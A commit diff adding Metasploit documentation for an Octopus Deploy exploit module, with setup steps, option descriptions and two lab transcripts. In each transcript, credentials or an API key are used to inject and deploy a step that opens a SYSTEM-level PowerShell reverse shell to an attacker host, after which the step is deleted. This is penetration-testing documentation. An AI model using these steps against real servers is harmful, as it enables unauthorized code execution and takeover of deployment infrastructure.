Land rapid7#8872 docs for octopusdeploy_deploy

h00die · h00die · commit a0585dcb9eba · 2017-08-22T21:36:44.000-04:00
diff --git a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md
@@ -0,0 +1,145 @@
+## Vulnerable Application
+
+  [Install Octopus Deploy server](https://octopus.com/docs/getting-started#Gettingstarted-InstalltheOctopusserver)
+  
+  [Create a test user/team](https://octopus.com/docs/administration/managing-users-and-teams) - Team should have "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
+  
+  [Create an API key](https://octopus.com/docs/how-to/how-to-create-an-api-key)
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/http/octopusdeploy_deploy```
+  4. Do: set ```PATH```, ```RHOST```, ```RPORT```, and ```SSL``` if needed
+  5. Do: set ```STEPNAME``` if desired
+  6. Do: set ```USERNAME``` and ```PASSWORD``` or just ```APIKEY```
+  7. Do: ```run```
+  8. You should get a shell.
+
+## Options
+
+  **APIKEY**
+
+  API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.
+
+  **USERNAME**
+
+  Username of the Octopus Deploy user.
+
+  **PASSWORD**
+
+  Password of the Octopus Deploy user.
+
+  **PATH**
+
+  Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".
+
+  **STEPNAME**
+
+  Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.
+
+  **SSL**
+
+  Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.
+## Scenarios
+
+### Octopus Deploy Server 3.16.0
+
+  Getting a privileged shell on Octopus Deploy server using administrative credentials.
+
+  ```
+  msf > use exploit/windows/http/octopusdeploy_deploy
+msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
+PATH => /octoADTest
+msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
+USERNAME => ODUser
+msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
+PASSWORD => Password1
+msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
+RHOST => 10.0.0.12
+msf exploit(octopusdeploy_deploy) > set RPORT 80
+RPORT => 80
+msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
+payload => windows/powershell_reverse_tcp
+msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
+LHOST => 10.0.0.7
+msf exploit(octopusdeploy_deploy) > run
+
+[*] Started reverse SSL handler on 10.0.0.7:4444 
+[*] Getting available projects
+[*] Using project TestProject2
+[*] Getting steps to TestProject2
+[*] Adding step r4XAJc to TestProject2
+[*] Getting available channels
+[*] Using channel Default
+[*] Getting next version
+[*] Using version 0.0.2
+[*] Creating release
+[*] Release Releases-79 created
+[*] Deploying TestProject2 version 0.0.2 to TestEnv
+[*] Getting updated steps to TestProject2
+[*] Deleting step r4XAJc from TestProject2
+[*] Step r4XAJc deleted
+[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500
+
+Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
+Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
+nt authority\system
+PS C:\Octopus\ADTest\Work\20170516025358-22> exit
+
+[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET
+
+msf exploit(octopusdeploy_deploy) >
+  ```
+
+  Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.
+
+  ```
+  msf > use exploit/windows/http/octopusdeploy_deploy
+msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
+PATH => /octoADTest
+msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
+RHOST => 10.0.0.12
+msf exploit(octopusdeploy_deploy) > set RPORT 80
+RPORT => 80
+msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
+payload => windows/powershell_reverse_tcp
+msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
+LHOST => 10.0.0.7
+msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
+APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
+msf exploit(octopusdeploy_deploy) > set STEPNAME shell
+STEPNAME => shell
+msf exploit(octopusdeploy_deploy) > run
+
+[*] Started reverse SSL handler on 10.0.0.7:4444 
+[*] Getting available projects
+[*] Using project TestProject2
+[*] Getting steps to TestProject2
+[*] Adding step shell to TestProject2
+[*] Getting available channels
+[*] Using channel Default
+[*] Getting next version
+[*] Using version 0.0.3
+[*] Creating release
+[*] Release Releases-80 created
+[*] Deploying TestProject2 version 0.0.3 to TestEnv
+[*] Getting updated steps to TestProject2
+[*] Deleting step shell from TestProject2
+[*] Step shell deleted
+[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500
+
+Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
+Copyright (C) 2015 Microsoft Corporation. All rights reserved.
+
+PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
+nt authority\system
+PS C:\Octopus\ADTest\Work\20170516025952-24> exit
+
+[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET
+
+msf exploit(octopusdeploy_deploy) > 
+  ```
